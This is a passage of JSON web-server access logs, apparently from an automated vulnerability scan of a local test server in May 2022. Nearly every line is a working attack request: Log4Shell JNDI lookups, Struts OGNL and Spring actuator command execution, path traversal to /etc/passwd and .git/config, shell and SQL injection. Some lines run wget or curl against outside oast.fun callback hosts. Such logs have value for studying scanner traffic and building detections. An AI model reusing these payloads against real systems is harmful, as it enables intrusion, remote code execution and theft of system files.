HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca2u0eosmpv1jhs80ca04o6kcd41ritki.oast.fun #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/29N5m9DbYHQ3aKhWCL6vLNKWpPf.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/29N5m6jf3t26lXwoOVh3wXZFldt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca2u0eosmpv1jhs80ca0c964wcauxhw6j.oast.fun #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//ca2u0eosmpv1jhs80ca09r8ynxzwsasht.oast.funPa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://ca2u0eosmpv1jhs80ca0nwb3uu37snwoe.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://${hostName}.uri.ca2u0eosmpv1jhs80ca075s4w9gobfqx5.oast.fun/a} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/modules/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik 